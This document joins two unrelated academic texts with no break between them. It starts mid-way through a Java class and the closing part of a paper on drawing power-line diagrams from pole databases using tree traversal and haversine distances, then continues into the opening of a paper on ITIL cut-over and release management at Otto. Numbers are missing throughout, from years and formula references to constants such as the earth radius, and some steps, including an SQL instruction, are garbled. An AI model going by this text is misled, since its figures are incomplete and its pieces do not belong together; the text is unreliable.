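    static final double R = 6371000.0;   // mean earth radius in metres

    // great-circle distance via the haversine formula (cf. formula (2) in section iii.c)
    static double span(double jA, double wA, double jB, double wB) {
        double dW = Math.toRadians(wA - wB);
        double dJ = Math.toRadians(jA - jB);
        double h = Math.sin(dW / 2) * Math.sin(dW / 2)
                 + Math.cos(Math.toRadians(wA)) * Math.cos(Math.toRadians(wB))
                 * Math.sin(dJ / 2) * Math.sin(dJ / 2);
        return 2 * R * Math.asin(Math.sqrt(h));
    }

    // simplified bearing as used in the paper (cf. formula (1)): longitude difference
    // over latitude difference, returned in degrees
    static double angle(double jA, double wA, double jB, double wB) {
        return Math.toDegrees(Math.atan2(jA - jB, wA - wB));
    }
}

the steering (veer) of a pole can then be derived, for example, by comparing the angles of successive line segments.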
the automatic drawing of power lines can be realized by processing these four parameters in the database while traversing each node, calculating the relative coordinates of each node and converting them into absolute coordinates.

iii. power line automatic drawing function design

a. traversal of multi-fork trees

since the relationship between the transformer and the poles is a tree structure, this multi-branch tree can be constructed by traversing the power line when drawing the circuit diagram, and all nodes in the tree can be processed one by one. this makes the automatic drawing of power line graphics possible. common multi-tree traversals can be divided into two types: level-first (breadth-first) traversal and depth-first traversal. depth-first traversal can be further divided into pre-order, in-order and post-order traversal; its principle is to traverse the nodes of the tree along its depth, searching each branch of the tree as deep as possible. level-first traversal visits the nodes of the tree level by level; its principle is to first visit the root node and find all of its children. these child nodes are in turn the root nodes of subtrees, so they are visited in the same way, and so on, level by level[ ].

b. power line traversal algorithm

although the power line graph has a multi-branch tree structure, there are many problems in the actual traversal operation. in previous multi-tree applications, whether depth-first or level-first traversal is used, each node stores information about its child nodes, so the children can be found directly by accessing the node and the traversal can be completed from top to bottom. in power lines, however, each pole node only knows its parent node, not its child nodes, and has no other relationship information, so it is difficult to determine the position of any node other than the root node, and the traditional traversal algorithms are not applicable. to solve this problem, this research makes some improvements on the basis of the level-first traversal algorithm. because the parent node of each node is known, all the nodes with the same parent node can easily be found, and top-down traversal is achieved on this basis. first, create an instance class "tree", so that each row of data in the database corresponds to an instance object in java, and add an attribute "children" to the tree object to hold all child nodes of the current node. second, load the data from the database into these instance objects and save all the instance objects in a list collection. the traversal algorithm then finds the root node, puts it into the result, and uses the children attribute to attach all the child nodes of each layer from top to bottom through recursion. the recursive traversal code is as follows.
//store all node data information in an object collection
List<Tree> result = new ArrayList<>();
//query the node data information
List<Tree> lists = new TestJdbc().queryAll();
//traverse to determine whether a node is the root node (it has no parent id)
for (Tree tree : lists) {
    if (tree.getPid() == null) {
        result.add(tree);
    }
}
//recursively attach the child nodes to each root node found
for (Tree parent : result) {
    recursiveTree(parent, lists);
}
//the judgment function adds every node whose pid matches the parent's id
//to the children attribute of the parent node object
public static Tree recursiveTree(Tree parent, List<Tree> list) {
    for (Tree tree : list) {
        if (parent.getId().equals(tree.getPid())) {
            tree = recursiveTree(tree, list);
            parent.getChildren().add(tree);
        }
    }
    return parent;
}

c. calculation of plane coordinates

the purpose of the traversal is not only to construct the multi-branch tree, but also to locate the coordinates of the traversed nodes. converting the longitude and latitude data of the poles into points in a plane rectangular coordinate system is essential, because a figure cannot be drawn directly from gps data. in order to draw the figure accurately in plane coordinates, the longitude and latitude data must first be converted into plane coordinate data, and the angle and the distance between two points must be calculated from the longitude and latitude data[ ]. for two poles a and b, the following calculation methods, derived from elementary geometry, realize this data conversion.

( ) the angle formed by the two points a and b is calculated as:

θ = arctan((ja − jb) / (wa − wb))

where θ is the angle (in degrees) between a and b, ja is the longitude of point a, jb is the longitude of point b, wa is the latitude of point a, and wb is the latitude of point b.

( ) the distance between the two points a and b is calculated with the haversine formula:

l = 2r · arcsin( sqrt( sin²((wa − wb)/2) + cos(wa) · cos(wb) · sin²((ja − jb)/2) ) )

where l is the distance between points a and b (m), r is the earth radius ( km), ja is the longitude of point a, jb is the longitude of point b, wa is the latitude of point a, and wb is the latitude of point b.

according to the calculation results of formulas ( ) and ( ), the storage in the database is shown in figure .

figure . storage in a database

during the traversal, the coordinates are located from the starting point, and each child node of a node is then found by the traversal algorithm. the relative coordinates of a node are calculated from the span, rotation angle and steering parameters between the child node and its parent node. because the relevant information of the poles needs to be modified during the traversal, and in order to guarantee the integrity and reliability of the original database and to improve the traversal speed, the information of the relevant substation should be copied into a temporary database before the actual traversal[ - ]. the traversal process is as follows.

( ) use the sql command "select into temporary table from original table where change table name" to create a temporary data table and copy the data of the change table to be drawn into the temporary table.

( ) find the starting point "transformer" in the temporary data table, and set the starting coordinate of the drawing to (x , y ) according to the actual position of the transformer in the substation.
( ) find the distribution board connected to the transformer, calculate the coordinates (x , y ) of the distribution board from the distance between the distribution board and the transformer, the steering and the steering angle, mark in the temporary database that the relative position coordinates of this node with respect to its parent node have been calculated, and mark in the parent node that the coordinates of this child node have been calculated.

( ) execute a loop over the temporary database to select the poles whose relative coordinates with respect to their parent node have been calculated, but whose child node coordinates have not yet been calculated.

( ) repeat step ( ) until all poles have been traversed.

in the traversal process, every record in the database takes part in multiple operations. if a substation contains many poles, one traversal cycle may take too long. in the actual traversal it may therefore be faster to use a stored procedure of the database to complete this work. a small code sketch of these coordinate calculations is given at the end of this section.

iv. generation of power circuit diagram

after the traversal calculation and plane coordinate positioning, the actual drawing also needs to display other relevant information for the user. therefore, the following work should be completed before the circuit drawing is generated automatically.

( ) traverse from the starting point (the transformer) to calculate the power supply radius of each pole.

( ) draw the title block and mark the drawing scale, drawing date, type and quantity of the various poles, model and length of the conductors, number of meter boxes, maximum power supply radius, etc.

( ) collect statistics on the types, specifications and quantities of the various poles in the substation, the length of the wires of the various specifications and types, the number of the various meter boxes (power meter boxes and lighting meter boxes), etc.

( ) according to the requirements of the power supply enterprise, a pole is represented as "○" and a container as "□".

( ) walk through the database again and draw the line diagram from the starting point.

by analyzing the demands of power supply enterprises for the drawing and archiving of power circuit diagrams and combining them with the characteristics of power lines, a multi-branch tree structure is established with the transformer as the root node, the lines as the paths and the poles as the nodes. after identifying the information stored in the database, a hierarchical traversal algorithm based on the multi-branch tree is proposed. in the drawing process, only four parameters of each node need to be processed: span, veer, angle and id number. the relative coordinates of each node are then calculated and converted into absolute coordinates by the layer-traversal algorithm of the multi-branch tree, so that the automatic drawing of power lines is realized. the drawing method discussed in this paper has been successfully applied in many power supply enterprises in our country. figure shows the circuit diagram of a certain substation generated automatically.

figure . circuit diagram of a transformer station automatically generated
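as a worked illustration of formulas ( ) and ( ) and of the coordinate positioning performed during the traversal, the following java sketch converts the latitude and longitude of a pole and its parent into an angle and a distance, and then derives the child's absolute plane coordinates from the parent's coordinates and the span. the class name, the use of radians and the earth-radius constant are assumptions of this sketch, not part of the paper.

// minimal sketch: convert the gps data of a parent/child pole pair into plane coordinates
public final class CoordinateUtil {

    private static final double EARTH_RADIUS_M = 6_371_000.0; // assumed mean earth radius in metres

    // formula ( ): angle between points a and b (returned in radians; atan2 avoids division by zero)
    public static double angle(double ja, double wa, double jb, double wb) {
        return Math.atan2(ja - jb, wa - wb);
    }

    // formula ( ): haversine distance between points a and b, in metres
    public static double distance(double ja, double wa, double jb, double wb) {
        double dLat = Math.toRadians(wa - wb);
        double dLon = Math.toRadians(ja - jb);
        double h = Math.pow(Math.sin(dLat / 2), 2)
                 + Math.cos(Math.toRadians(wa)) * Math.cos(Math.toRadians(wb))
                   * Math.pow(Math.sin(dLon / 2), 2);
        return 2 * EARTH_RADIUS_M * Math.asin(Math.sqrt(h));
    }

    // absolute coordinates of a child pole, given the parent's absolute coordinates,
    // the span (distance to the parent) and the angle between parent and child
    public static double[] childCoordinates(double parentX, double parentY, double span, double angle) {
        double x = parentX + span * Math.sin(angle); // east component
        double y = parentY + span * Math.cos(angle); // north component
        return new double[] { x, y };
    }
}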
v. conclusion

the system manages power line parameter data through a database and realizes the function of automatically drawing power graphs according to the scale set by the user, thus saving human resources. when the information about a power line changes, the corresponding data in the database can be changed quickly. the system can therefore well meet the needs of china's power grid reconstruction, with a short drawing cycle and high working efficiency. it has achieved good results in practical application at power supply enterprises in many places.

references
[ ] peng liangyong, li xiaodan. realization of fast coordinate transformation method for cad graphics [j]. surveying and mapping and spatial geographic information.
[ ] li huiping, he lianfang. discussion on the teaching of auxiliary modules of autocad software [j]. journal of higher education.
[ ] peng qiwei, zhang hao. adaptive relay algorithm for medium voltage distribution line carrier based on multi-tree traversal [j]. power system communication.
[ ] wang fangxiu, liu chunhong. a new algorithm for constructing binary tree by hierarchical traversal and other traversal [j]. journal of wuhan university of light industry.
[ ] zhao xiang, chen yan. a coordinate transformation algorithm in geographic information system [j]. computer and network.
[ ] yu xiaomin. data structure and algorithm [m]. beijing university of aeronautics and astronautics press.
[ ] kou chunpeng. design and implementation of sqlserver database information acquisition system [d]. beijing university of chemical technology.

a framework for cut-over management

guido nageldinger, department of testing and release management, otto (gmbh & co kg), a member of the otto group, hamburg, germany
corresponding author: guido nageldinger, guido.nageldinger@ottogroup.com
academic editor: letha etzkorn
submitted august, accepted october, published november; doi . /peerj-cs. copyright nageldinger, distributed under creative commons cc-by.

abstract

the purpose of this paper is to provide a governance structure for it-related projects in order to assure a safeguarded and timely transition to a productive environment. this transitioning, which rarely exceeds a weekend, is colloquially called 'cut-over', 'rollout' or 'deployment'. the governance structure is defined in accordance with a set of project-specific deliverables for a cascade-type procedural project-management model, which is integrated within an information technology infrastructure library (itil)-orientated service organization. this integration is illustrated by the use of a semi-agile release model. due to the release model selected, which is particularly characterized by its bundling of projects for a release-specific rollout (as it is referred to in the project documentation), a new definition and interpretation of deployment from a generic itil perspective is required. the facilitated release model requires a distinction between a project-specific cut-over and a release-specific rollout. this separation gives rise to two types of go-live scenarios: one for each participating project and one for each release. additionally, an interplay between cut-over planning for a project and rollout planning for a release becomes apparent. projects should already incorporate cut-over related deliverables in the initial planning phase.
even though consulting methodologies such as asap (accelerated sap) recommend scattered, project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to prepare systematically for a project-specific cut-over with all required deliverables. the framework provided maps out itil's release and deployment process by means of it projects; furthermore it allows it projects to interface easily with the itil change-management process.

subjects computer architecture, theory and formal methods, software engineering
keywords release, project-specific cut-over, release-specific rollout, go-live preparation, go-live, deployment, application-specific cut-over, itil, it service management, it project management

introduction

most it-related projects, in particular implementation and software development projects, change a productive system landscape when taken live. on the one hand these projects face the challenge of delivering a change (within an itil context) in a timely and cost-effective manner. on the other hand, it organizations need to assure the integrity of the system landscape and are required to minimize potential interference to the ongoing business, as service level agreements (slas) need to be fulfilled. the central computing and telecommunications agency (ccta), a government agency in great britain, developed the information technology infrastructure library (itil) as early as the end of the s. the latest update of itil v was published in and is frequently referenced as itil . is it still relevant? yes, because it helps bring order to it chaos. proehl et al. ( ) analyzed articles in the field of it service management and confirmed the earlier work by shahsavarani & ji ( ). both studies found a growing number of published papers dealing with the development of concepts, constructs, models, methods and implementations for theory development. performance issues in it service management, justifications, and it infrastructure library topics are among the most popular topics of research; only a few articles have used or developed theories. marrone et al. ( ) found that organizations adopting itil implemented more operational-level processes than tactical/strategic-level processes; the study utilizes survey responses from the uk, usa, dach (german-speaking countries) and australia. itil is rarely seen in isolation, and current research focuses on its integration with it governance standards, such as iso/iec , and other methodologies, such as cobit, prince and the iso x-family (tanovic & orucevic, ; shivashankarappa et al., ; jäntti et al., ; larsson, rusu & aasi, ). itil's release and deployment management processes are demanding.
jokela & jäntti ( ) as well as lahtela & jäntti ( ) identified within their case studies the following common challenges:
• no existing process for product portfolio release and deployment management
• lack of communication
• unclear release and deployment management and/or product portfolio management process roles
• lack of resources and time for product portfolio integration, testing and reviewing
• existing models and practices are not suitable for agile software development
• uncertainty about the contents of release packages
• high release distribution frequency
• different and tailored release packages
• the change management is not up to date, and
• no existing service catalog.

the project-specific cut-over, as defined in more detail below, requires detailed planning, many meetings and several agreements with all stakeholders involved. which questions need to be addressed? here are just some of them:
• how should the project outcomes be transferred to operation?
• which scenario provides the best compromise between time, cost and risk?
• what happens if the cut-over fails?
• how can the previous system condition or version be reinstalled in case the cut-over fails?
• how can we ensure that projects start early enough, with all the necessary preparation work?
• how can cut-over activities be aligned within an it service organization?
• how do we measure the success of the cut-over, and how can we maximise it?

unfortunately, answers and activities associated with these cut-over related topics are frequently addressed too late, probably because the cut-over is one of the final steps in a project and can therefore remain hidden for a long time. if a cut-over and its associated deliverables are not integrated within the overall project plan then projects are at risk of being delivered too late. for this reason, there is an urgent business need to govern projects in such a manner that they do not forget to cover cut-over related items. so, which items should projects cover? this question and many others are addressed by a 'framework for deployment management' as referred to below in this document. the purpose of this paper is to provide a methodology which assures a robust and timely go-live for projects. an itemised objective overview:
• to list the key deliverables projects need to provide in order to assure a timely and safe go-live
• to illustrate how these deliverables can be integrated within the itil release and deployment process
• to look into different deployment types, which this paper refers to as (a) project-specific cut-over, (b) application-specific cut-over and (c) release-specific rollout, along with the timeframes and timepoints involved, and lastly
• to present a framework which enables an it-service organization to transition a project to a productive environment.

the scope of the deployment framework introduced is required
• to be applicable within an information technology infrastructure library (itil)-orientated service organization, and
• to extend commonly facilitated project-management methodologies.

as with most management practices, there are always more ways to achieve similar results with other approaches. however, in order to examine and establish good management practice, these methodologies need to be published to facilitate comparison. the framework published here is just one of many potential options.
it illustrates how deployment activities can be harmonised with commonly facilitated it projects as well as quality-management practices, and integrated in an itil environment. even though it is possible to take advantage of the deployment framework presented here without itil, many companies have adopted itil recommendations and best practices and are organized in a service-orientated manner. it projects are therefore unlikely to exist in isolation and are more likely to be embedded in a service-orientated manner. itil is known to be generic and is not complete by itself. its purpose is not to provide advice on how to implement it service management processes; instead it requires integration with other disciplines such as project management and quality management. the framework presented here in the form of an illustrative case study arose during my consultancy work and has been implemented for some applications within the department of testing and release management of otto (gmbh & co kg), which is a member of the otto group. it is not a hypothetical model. projects which wish to cut over in the form of a release-specific rollout are requested to comply with this framework. within every release, between to projects participate. six release-specific rollouts are conducted every year. even though consulting methodologies such as asap (accelerated sap) recommend scattered project-specific deliverables useful for cut-over planning, this publication offers an integrated approach on how to systematically prepare for a project-specific cut-over with all required deliverables. the framework provided extends the itil release and deployment process by means of it projects and allows it projects to interface easily with the itil change-management process. the activities of the otto group, with its headquarters located in hamburg, germany, are grouped into three main business areas: (i) multichannel retail, (ii) financial services and (iii) service. this structure is consistently reflected in the group's activities along the retail value chain, in logistics for instance. in the year / , the group generated consolidated revenue of more than billion euros and employed about , staff worldwide.

project-specific cut-over versus release-specific rollout

itil is often facilitated as a checklist. with regard to the release and deployment process, it consists of the following steps (rance, ):
• plan and prepare a release
• build and test a release
• plan and prepare deployment
• conduct deployment
• conduct review, and
• provide early-life support.

due to its generic nature and the need to interface with other disciplines, it-service organizations implement these steps quite differently. the variability of implementation options may be caused by different interpretations of the term 'release', which is also related to the term 'change'. how does itil define these terms? the term 'release' is defined as: "one or more changes to an it service that are built, tested and deployed together. a single release may include changes to hardware, software, documentation, processes and other components." (axelos, ). the term 'change' is defined as: "the addition, modification or removal of anything that could have an effect on it services.
the scope should include changes to all architectures, processes, tools, metrics and documentation, as well as changes to it services and other configuration items." (axelos, ).

figure . example of a semi-agile release model with its project and rollout view and its relation to itil's application management, problem & incident management as well as change management

in order to safeguard the related system landscape as well as the associated services, conventions need to be outlined on the practical arrangement and organization of release-related changes. here, the term 'release model' is used for a set of rules and conventions used to bundle and organize a release. figure illustrates a semi-agile release model, which is used within this publication as an example to address some dependencies (nageldinger, ). this release model is called 'semi-agile' here because it consists of an agile section and a release phase, which follows a classical sequential pattern (cascade model). during the agile period, phases between projects are non-clocked. project phases which fall within the agile period relate to the project planning, design and realization section, and can be conducted in sprints. once these projects participate in an integration test, their phases need to be clocked. independently of which release model is facilitated, the release phase will most likely consist of (i) an entry gate, (ii) technical and business-related integration tests with their acceptance procedures, and (iii) the release-specific rollout (see fig. ).

let us now look at the deployment types. in case the bundling of projects is foreseen by the release model, such as in the one presented here, we encounter deployment related to the release as well as deployment related to the participating projects. itil does not distinguish between these. here, the term 'deployment' (axelos, ) is defined as "an activity responsible for movement of new or changed hardware, software, documentation, process etc. to the live environment. deployment is part of the release and deployment management process." it can probably be argued that such a distinction is unnecessary, since all bundled projects are to be deployed in the same time slot. however, the project-specific deployment and its associated preparation work are owned by the project manager and, in the case of larger projects, by a designated cut-over manager.

figure . illustration of the release phase and the positioning of the rollout window

according to itil, the release and deployment manager owns the release and its associated deployment. itil's definition of 'deployment' lacks conceptual clarity. this is because, if we look only at the movement of software to the live environment, we also need to distinguish between the actual movement and its use, when the software is 'switched on'. this is necessary if, for example, legal changes come into effect at a specific point in time but the software is required to be moved to the live environment beforehand. for the purposes of this paper, the term 'deployment' is from now on used solely to refer to the movement of software to the live environment, which is commonly conducted within a restricted timeframe.
the term 'point-of-use' is facilitated to account for the point in time at which the software is 'switched on'. in order to safeguard our system landscape and associated services we need to monitor both the deployment (a timeframe) and the point(s)-of-use (points in time). in the context of a release, one deployment and potentially several points-of-use are scheduled. this aspect is elaborated further below in the discussion of the release-change. besides the participating projects, a release additionally includes service packs (a phrase used for minor upgrades), bug fixes and smaller system-related features. these non-project elements are usually governed by separate changes. all ingredients of a release should provide the option of independent transitioning to the productive environment. if this option is not provided, then projects or non-project elements cannot easily be excluded from the release if they fail the integration test. smaller projects are likely to be bundled in the form of a release and then transitioned to a productive environment in the form of a release-specific rollout. major it implementation projects are preferably transitioned to a productive environment independently, in order to reduce complexity.

the term 'project-specific cut-over' defines the transition of a project to a productive environment. it relates to the project as a whole and includes the software deployment and its point of use. the actual timeframe associated with the project-specific cut-over is called the 'cut-over window'. the 'release-specific rollout' defines the collective transition of bundled projects to a productive environment. in the same way, the associated timeframe is called the 'rollout window' (nageldinger, ). frequently, projects communicate what is commonly called a 'go-live date' on their overall project chart. in view of the reasons given above, this could mean (i) the end of the software deployment, (ii) the end of the cut-over window, which relates to the transitioning of the whole project, or (iii) the point-of-use. it is therefore recommended to question what exactly this date refers to. besides the project-specific cut-over and the release-specific rollout we are most likely to face a third transitioning aspect, here called the 'application-specific cut-over': this relates to a specific system or application and mainly covers approaches related to maintenance or upgrades. it differs from the project-specific cut-over in that it consists of canonical (i.e., reoccurring with every rollout) activities and tasks. the deployment of service packs, for example, can be organized canonically. within an sap context the term 'rollout' is frequently associated with a so-called 'template approach'. in this, the core configuration is embedded within a reusable template and the country-specific characteristics are added separately in the form of a local configuration (sap, ). sap's usage of the term 'rollout' is quite similar to the definition provided here and its associated release context. this is because the release-specific rollout also consists of reoccurring activities, here referred to as the 'application-specific cut-over', which is similar to sap's template approach. the project-specific cut-over activities, which are non-reoccurring, may be considered in the same way as sap's country-specific characteristics.
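to make these distinctions concrete, the following sketch models them as plain java classes; the terms are the ones defined above, but the modelling itself is an illustration under my own assumptions and is not taken from the paper.

import java.time.LocalDateTime;
import java.util.List;

// hypothetical data model of the transition terms defined above
public class ReleaseSpecificRollout {
    LocalDateTime rolloutWindowStart;        // release-specific rollout window (a timeframe)
    LocalDateTime rolloutWindowEnd;
    List<ProjectCutOver> bundledProjects;    // projects participating in the release
    List<String> nonProjectChanges;          // service packs, bug fixes, smaller features (separate changes)
}

class ProjectCutOver {
    LocalDateTime cutOverWindowStart;        // project-specific cut-over window (the project as a whole)
    LocalDateTime cutOverWindowEnd;
    LocalDateTime deploymentStart;           // deployment: movement of software to the live environment
    LocalDateTime deploymentEnd;
    List<LocalDateTime> pointsOfUse;         // points in time at which the software is 'switched on'
}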
the cut-over schedule is a list of the tasks and activities required in order to conduct the cut-over. it differs from the ordinary overall project schedule in that it focuses only on tasks and activities within the cut-over window, is of short duration and lasts only for a couple of hours or a weekend. the cut-over schedule is created with duration-based scheduling techniques. additionally, it contains a list of prerequisites, such as the delivery of training courses, the installation of printers, etc. these prerequisites need to be completed before the actual cut-over can be conducted and are part of the overall project schedule. the cut-over schedule does not relate to the post go-live phase. for this objective, projects need to have a separate plan which, for example, addresses aspects of support, data conservation and accounting closure procedures. besides the cut-over schedule, the cut-over plan contains a variety of other deliverables, in the same way as a project-management plan; these are further elaborated below. key elements of a cut-over schedule are, for example, termination points, frequently called 'points-of-return' (por). these pors aim to trigger activities used (i) to restore the initial condition or (ii) to incrementally fall back to a previous por. the last por is referred to as the 'point-of-no-return' (ponr). the ponr does not always fall within the cut-over window. the fallback concept is the name of a document used to describe the activities which are potentially necessary at these pors, in case the system needs to be rolled back to a previous state or even to its initial state. if the cut-over activities pass the ponr, then we enter the disaster scenario. for such events, a disaster-recovery concept defining appropriate measures should be in place. the disaster-recovery concept is mentioned here because it is unfortunately frequently neglected. it is regularly associated with earthquakes, hurricanes or terrorist attacks; however, unforeseen events during a cut-over after the ponr can also trigger the disaster scenario (bsi, ). the cut-over window is illustrated in fig. .

figure . visualization of the cut-over window

the sections above clarify why certain release models, which foresee the bundling of projects for a collective rollout, require at least two perspectives: a project-specific and a release-specific one. an important outcome of the preparation for a project-specific cut-over and a release-specific rollout is the go-live scenario. a go-live scenario defines the overall approach on how a cut-over or rollout is to be conducted. the go-live scenarios differ in most cases, which is illustrated by an example in fig. . the go-live scenario of project a utilizes the rollout windows of release and , whereas projects b and c merely take advantage of one rollout window. the release-specific rollout also facilitates go-live scenarios. here, the rollout of release uses a sequential rollout strategy, while the rollout of release uses a parallel rollout strategy.

recommended deliverables and outcomes for the preparation of a project-specific cut-over

this chapter covers recommended deliverables and outcomes for projects in order to prepare for a project-specific cut-over. projects are assumed to be arranged in a cascading manner with classic phases, in order to keep this publication as simple as possible.
however, as stated above, activities may be undertaken in an agile manner before entering the release phase.

figure . illustration of two release-specific rollouts: the go-live strategy of project a utilizes the rollout windows of release and , whereas projects b and c facilitate only one rollout window. in the same way as a project's go-live strategy, the release-specific rollout uses a go-live strategy for the release. in this illustration, the rollout of release utilizes a sequential rollout strategy and the rollout of release a parallel rollout strategy.

the release model presented in fig. illustrates the following generic phases, which are quite similar in the case of it-related projects:
• project-planning phase
• design phase
• realization phase
• test phase
• cut-over phase
• support phase.

quality management is facilitated in order to request these cut-over relevant project deliverables, which are then reviewed by rollout management. table illustrates the potential deliverables (nageldinger, ). some of them are mandatory, others are optional. these deliverables are further elaborated below and presented according to their project phases.

table . project-specific deliverables for cut-over planning, grouped by project phase (in the original table, deliverables related to rollout management are set in bold, optional deliverables which are not evaluated by quality management are set in italics, and all others are mandatory):
• project planning: plan for deployment management; establish cut-over manager (com) position; initial dialogue with rollout management
• design: system-profile description; system landscape design (slde); extension to slde due to go-live strategy; go-live strategy; fallback strategy; framework for cut-over planning; stakeholder analysis; kick-off; communication plan; completely defined cut-over team
• realization: decision model presentation for the go-live & fallback strategy; decision related to the go-live & fallback strategy; one-pager; draft cut-over plan; risk register; dependency matrix; dialogue with rollout management
• test: final cut-over plan; fallback concept; disaster-recovery concept; plan for the deployment of personnel; cut-over test; go-live simulation
• cut-over: operational cut-over
• support: observation of incidents; lessons learned

table . activity types used for a rollout/cut-over schedule (ordinary activities are not assigned an activity type):
• info: someone needs to be informed, usually by e-mail.
• checkpoint: technical verification point within the cut-over/rollout flow.
• optional: the activity is conducted only for certain rollouts; if the activity is not required then the time is set to .
• security: security-related activity, such as a back-up or the implementation of restore points.
• handover: handover of a certain document, protocol etc.
• unique: non-recurring activity within the rollout flow; commonly relates to a project and is therefore not facilitated for other rollouts.
• breakpoint: breakpoints are used during task or process chains in order to verify intermediate results; this activity type relates to these breakpoints.
• comment: project-planning tools often provide limited functionality related to comments within the work breakdown structure (wbs).
comments are activities with time = and are merely used to provide additional information within the wbs.

project-planning phase

the preparation of a project-specific cut-over already needs to be considered during the planning phase of a project. key deliverables are (i) a decision related to the establishment of a cut-over manager position and (ii) an agreement on the cut-over specific deliverables, which are included (iii) within a plan for deployment management.

plan for deployment management

in order to deliver a cut-over plan on time it is important that the cut-over related deliverables and outcomes are already taken into consideration during the planning phase of a project. larger projects will probably require a separate schedule for all cut-over related planning tasks and activities, whereas smaller projects include them in their overall project schedule. here, this key deliverable is called the deployment management plan. please note that these tasks relate solely to the necessary preparation and planning work and not to the cut-over schedule itself.

establish cut-over manager (com) position

during the planning phase it needs to be decided whether a cut-over manager (com) position is to be implemented. the com role may be compared with the role of a project manager; it is solely an administrative role which covers it-related topics as well as business-related ones. the only difference is that the com focuses on the preparation work associated with activities conducted within the cut-over window. a com is responsible for the preparation, planning and execution of the project-specific cut-over. he or she needs to be positioned beside the project manager and should be part of the steering committee, because conflicts of interest are likely to occur between the com and the project manager. additionally, a com needs to drive decisions and potential change requests related to the cut-over; many of these bear associated risks. a common role for a com would include the following responsibilities:
• drive a decision on the final go-live strategy
• implementation and guidance of a cut-over team
• creation of a cut-over plan
• creation of a list of initial conditions required to be met prior to the cut-over
• initiating a list of activities after cut-over
• planning, execution and organization of the cut-over test and go-live simulation.

smaller projects do not usually need a com, as the project manager fulfils this role.

initial dialogue with rollout management

during the project-planning phase an initial dialogue with rollout management is mandatory, because the related deliverables need to be scaled to the project size. this scaling is quite difficult to automate since it depends on experience and the potential interfaces involved. a simple formula, for example one based on the project budget, is insufficient.

design phase

prior to completion of the design phase, the go-live strategy and fallback strategy should be finalized. depending on the project size, these key deliverables can be combined and should provide a top-level description of options on how to transition the project to a productive environment, as well as how the initial state can be restored.

go-live strategy

the go-live strategy is of an investigative nature.
it should provide several potential go-live options with their associated impacts, rather than an ultimate solution. it should foster discussions related to the topic. the idea is to provide a general overview and the associated opinions. this document is later used to balance stakeholder interests and to carve out the final go-live method. a go-live strategy starts with the go-live scope. how does the go-live scope differ from the project scope? practically speaking, the go-live scope is the elaborated version of the initial project scope and is therefore more concrete. the project scope, for example, can state the introduction of a system to meet the purpose xyz; a go-live scope needs to state precisely which system is going to be implemented, list the technology involved and state the required organizational changes. a project scope, for example, can state the improvement of a process; the go-live scope needs to state how a particular process is to be improved and which changes are required to be conducted. it is recommended to define the go-live scope in writing during a workshop attended by all project key players. this exercise is valuable for the overall project, as well as for identifying scope changes that have already occurred. a properly defined go-live scope is a prerequisite for evaluating all other cut-over relevant questions. the go-live strategy covers the following aspects:
• a description of how the project can be transitioned to the live environment. the description can be of a generic nature and should relate to the major approaches, such as big-bang, phased go-live, or iterative methods.
• it is highly recommended to provide several go-live options which identify and provide for the various associated risks.
• many go-live scenarios potentially impact the business and technical infrastructure. the impact and its potential consequences should be discussed with the stakeholders. their opinion should be included within the go-live strategy and referenced as well.
• alternative go-live approaches, which are probably not investigated further, should be defined and recorded. additionally, it should be recorded why particular options are not followed up.
• one section should focus on potential go-live dates. again, rather than providing one ideal date, several potential dates should be evaluated. what are the benefits and catches of these dates? which dates could be used as an alternative in case of project delays? who recommends these dates? what is the reasoning behind them?
• a cut-over window usually lasts for just a few hours; however, some projects require a weekend. which constraints and risks are associated with the cut-over timeframe? what are the stakeholders' wishes? why do they request a shorter or longer timeframe?
• many projects alter existing business processes. these changes should be addressed in the form of an as-is and to-be description. which processes are newly introduced, altered or deactivated? the departments which are impacted should be identified as well. who are the key contact persons?
• some projects alter the organization. if this is the case, what does the new organization look like? a section of the project plan should describe and illustrate the old and new organization. it should highlight the targeted changes, as well as how the targeted changes are to be achieved. are the change constraints related to the timeframe?
projects with a significant reorganization focus should employ an organizational change management task force which delivers this information.
• since people tend to change their opinion or might need to be contacted later about this, further discussions and all related references should be logged.
• how many people are going to be impacted during and after a potential go-live? the impact can be of a technical, organizational and/or business nature.

it is an open secret that many companies do not document their business processes. major implementation projects therefore require this task to be conducted. the go-live strategy needs to focus on the targeted change by comparing the as-is with the to-be state. it outlines transition options in order to cut over a project to a productive environment. these transition options also include the technical aspects and the system landscape. however, the technical documentation of the as-is and to-be state is usually conducted in a separate document, here called a 'system landscape design' (slde) document.

system landscape design (slde)

the creation of an slde is commonly the task of a core technology or it architecture department. for further cut-over planning it is obviously essential that this document exists, and that the current as well as the future system landscape is not only presented in a graphical manner but also properly described. even though some companies have a configuration management database (cmdb) in place, the information available is frequently not up to date or lacks information required by the project. the creation of an slde is therefore a task which needs to be foreseen in most it implementation projects. from the cut-over perspective, additional questions need to be answered, for example:
• who are the application's contact persons (such as business owner, administrator, key users etc.)?
• which business processes are linked to the as-is and to-be system landscape?
• which departments currently work with the applications involved?
• a list of associated applications
• a list of interfaces, their business objective and the technical protocol used.

extension to slde

certain go-live approaches require an extension of the slde, which is treated here as a separate deliverable so that it is not forgotten. extensions are, for example, particular interfaces for data-migration purposes. system landscapes related to the proposed test methodology, as well as to the go-live simulation and the cut-over test explained further below, are also important extensions of the slde.

system profile description

if a project is initiated in an environment where a cmdb is missing or not sufficiently maintained, then system-profile descriptions need to be created; this is commonly conducted in the form of a survey. such a survey should be conducted together with the department which already owns the cmdb. it is therefore advisable during the project-planning phase to conduct a brief review of how well the system landscape is documented and to foresee the system-profile descriptions as an evaluation task within the project schedule, since this task can become quite time-consuming.

fallback strategy

the fallback strategy should be defined in writing within the same timeframe as the go-live strategy. it provides a top-level draft of the potential activities required in order to reinstall the initial state prior to the start of cut-over.
the detailed version of this document, here called the 'fallback concept', will be created later and finalized during the test phase. the fallback strategy addresses the following questions:
• how can the system landscape be rolled back to its state prior to the start of cut-over? are further scenarios possible?
• how long would such a fallback procedure take?
• which criteria or conditions should trigger a fallback?
• which risks are associated with each fallback option provided? what do their mitigation strategies look like?
• in case of a fallback, how great is the potential business impact? can the potential impact be quantified? how great is the impact in case a foreseen fallback scenario fails? how likely is it to occur? how great is the impact in case the system landscape involved is unavailable for one day? how many days can the business survive without it?
• which model should be used in order to calculate the business impact?
• what is the maximum acceptable downtime? how is it calculated? are service level agreements (slas) jeopardized? how great are the potential contractual penalties?
• where can potential pors be positioned? where is the ponr? do all relevant systems have a disaster-recovery concept in place, in case the ponr has been reached and things go wrong? is it possible to assign a potential business impact to each por identified? what are the termination criteria associated with each por?

the questions provided are obviously not complete, but are intended to illustrate the potential complexity involved.

